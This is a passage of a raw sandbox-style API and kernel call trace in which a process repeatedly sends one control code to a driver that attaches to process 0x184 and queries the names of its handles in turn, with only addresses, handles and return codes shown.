0x0 [0243.942] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.942] ObReferenceObjectByHandle (in: Handle=0x288, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00123f560, HandleInformation=0x0) returned 0x0 [0243.942] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.942] PsReleaseProcessExitSynchronization () returned 0x2 [0243.942] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.942] ObQueryNameString (in: Object=0xfffff8a00123f560, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.943] ObfDereferenceObject (Object=0xfffff8a00123f560) returned 0x1 [0243.943] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.943] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.943] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.943] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.943] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.943] PsAcquireProcessExitSynchronization () returned 0x0 [0243.943] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.943] ObReferenceObjectByHandle (in: Handle=0x28c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000f86700, HandleInformation=0x0) returned 0x0 [0243.943] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.943] PsReleaseProcessExitSynchronization () returned 0x2 [0243.943] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.943] ObQueryNameString (in: Object=0xfffff8a000f86700, ObjectNameInfo=0xfffffa800312e044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312e044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.943] ObfDereferenceObject (Object=0xfffff8a000f86700) returned 0x1 [0243.943] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.943] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.943] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.944] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.944] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.944] PsAcquireProcessExitSynchronization () returned 0x0 [0243.944] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.944] ObReferenceObjectByHandle (in: Handle=0x290, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001295e10, HandleInformation=0x0) returned 0x0 [0243.944] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.944] PsReleaseProcessExitSynchronization () returned 0x2 [0243.945] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.945] ObQueryNameString (in: Object=0xfffff8a001295e10, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.945] ObfDereferenceObject (Object=0xfffff8a001295e10) returned 0x1 [0243.945] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.945] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.945] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.945] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.945] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.945] PsAcquireProcessExitSynchronization () returned 0x0 [0243.945] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.945] ObReferenceObjectByHandle (in: Handle=0x294, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0012565f0, HandleInformation=0x0) returned 0x0 [0243.945] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.945] PsReleaseProcessExitSynchronization () returned 0x2 [0243.946] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.946] ObQueryNameString (in: Object=0xfffff8a0012565f0, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.946] ObfDereferenceObject (Object=0xfffff8a0012565f0) returned 0x1 [0243.946] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.946] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.946] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.946] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.946] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.946] PsAcquireProcessExitSynchronization () returned 0x0 [0243.946] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.946] ObReferenceObjectByHandle (in: Handle=0x298, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00124d9a0, HandleInformation=0x0) returned 0x0 [0243.946] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.946] PsReleaseProcessExitSynchronization () returned 0x2 [0243.946] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.946] ObQueryNameString (in: Object=0xfffff8a00124d9a0, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.946] ObfDereferenceObject (Object=0xfffff8a00124d9a0) returned 0x1 [0243.946] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.947] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.947] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.947] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.947] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.947] PsAcquireProcessExitSynchronization () returned 0x0 [0243.947] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.947] ObReferenceObjectByHandle (in: Handle=0x29c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0013bf060, HandleInformation=0x0) returned 0x0 [0243.947] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.947] PsReleaseProcessExitSynchronization () returned 0x2 [0243.947] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.947] ObQueryNameString (in: Object=0xfffff8a0013bf060, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.947] ObfDereferenceObject (Object=0xfffff8a0013bf060) returned 0x1 [0243.947] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.947] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.947] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.947] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.948] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.948] PsAcquireProcessExitSynchronization () returned 0x0 [0243.948] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.948] ObReferenceObjectByHandle (in: Handle=0x2a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001226d00, HandleInformation=0x0) returned 0x0 [0243.948] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.948] PsReleaseProcessExitSynchronization () returned 0x2 [0243.948] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.948] ObQueryNameString (in: Object=0xfffff8a001226d00, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.948] ObfDereferenceObject (Object=0xfffff8a001226d00) returned 0x1 [0243.948] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.948] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.948] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.948] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.948] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.948] PsAcquireProcessExitSynchronization () returned 0x0 [0243.948] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.948] ObReferenceObjectByHandle (in: Handle=0x2a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001232060, HandleInformation=0x0) returned 0x0 [0243.948] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.949] PsReleaseProcessExitSynchronization () returned 0x2 [0243.949] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.949] ObQueryNameString (in: Object=0xfffff8a001232060, ObjectNameInfo=0xfffffa8003087044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003087044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.949] ObfDereferenceObject (Object=0xfffff8a001232060) returned 0x1 [0243.949] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.949] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.949] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.949] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.949] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.949] PsAcquireProcessExitSynchronization () returned 0x0 [0243.949] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.949] ObReferenceObjectByHandle (in: Handle=0x2a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001254f80, HandleInformation=0x0) returned 0x0 [0243.949] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.949] PsReleaseProcessExitSynchronization () returned 0x2 [0243.949] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.949] ObQueryNameString (in: Object=0xfffff8a001254f80, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.949] ObfDereferenceObject (Object=0xfffff8a001254f80) returned 0x1 [0243.949] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.949] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.950] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.950] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.950] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.950] PsAcquireProcessExitSynchronization () returned 0x0 [0243.950] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.950] ObReferenceObjectByHandle (in: Handle=0x2ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001419fc0, HandleInformation=0x0) returned 0x0 [0243.950] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.950] PsReleaseProcessExitSynchronization () returned 0x2 [0243.950] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.950] ObQueryNameString (in: Object=0xfffff8a001419fc0, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.950] ObfDereferenceObject (Object=0xfffff8a001419fc0) returned 0x1 [0243.950] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.950] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.950] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.950] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.950] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.950] PsAcquireProcessExitSynchronization () returned 0x0 [0243.950] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.950] ObReferenceObjectByHandle (in: Handle=0x2b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0013eccf0, HandleInformation=0x0) returned 0x0 [0243.950] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.103] PsReleaseProcessExitSynchronization () returned 0x2 [0244.103] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.103] ObQueryNameString (in: Object=0xfffff8a0013eccf0, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.103] ObfDereferenceObject (Object=0xfffff8a0013eccf0) returned 0x1 [0244.103] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.103] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.103] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.103] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.103] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.103] PsAcquireProcessExitSynchronization () returned 0x0 [0244.103] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.103] ObReferenceObjectByHandle (in: Handle=0x2bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001076c50, HandleInformation=0x0) returned 0x0 [0244.104] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.104] PsReleaseProcessExitSynchronization () returned 0x2 [0244.104] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.104] ObQueryNameString (in: Object=0xfffff8a001076c50, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.104] ObfDereferenceObject (Object=0xfffff8a001076c50) returned 0x1 [0244.104] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.104] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.104] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.104] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.104] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.104] PsAcquireProcessExitSynchronization () returned 0x0 [0244.104] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.104] ObReferenceObjectByHandle (in: Handle=0x2c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00184c750, HandleInformation=0x0) returned 0x0 [0244.104] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.104] PsReleaseProcessExitSynchronization () returned 0x2 [0244.104] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.104] ObQueryNameString (in: Object=0xfffff8a00184c750, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.104] ObfDereferenceObject (Object=0xfffff8a00184c750) returned 0x1 [0244.104] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.104] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.104] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.104] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.104] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.104] PsAcquireProcessExitSynchronization () returned 0x0 [0244.104] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.104] ObReferenceObjectByHandle (in: Handle=0x2c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0013dca30, HandleInformation=0x0) returned 0x0 [0244.104] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.105] PsReleaseProcessExitSynchronization () returned 0x2 [0244.105] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.105] ObQueryNameString (in: Object=0xfffff8a0013dca30, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.105] ObfDereferenceObject (Object=0xfffff8a0013dca30) returned 0x1 [0244.105] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.105] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.105] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.105] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.105] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.105] PsAcquireProcessExitSynchronization () returned 0x0 [0244.105] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.105] ObReferenceObjectByHandle (in: Handle=0x2d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001418e70, HandleInformation=0x0) returned 0x0 [0244.105] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.105] PsReleaseProcessExitSynchronization () returned 0x2 [0244.105] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.105] ObQueryNameString (in: Object=0xfffff8a001418e70, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.105] ObfDereferenceObject (Object=0xfffff8a001418e70) returned 0x1 [0244.105] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.105] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.105] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.105] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.105] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.105] PsAcquireProcessExitSynchronization () returned 0x0 [0244.105] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.105] ObReferenceObjectByHandle (in: Handle=0x2dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, 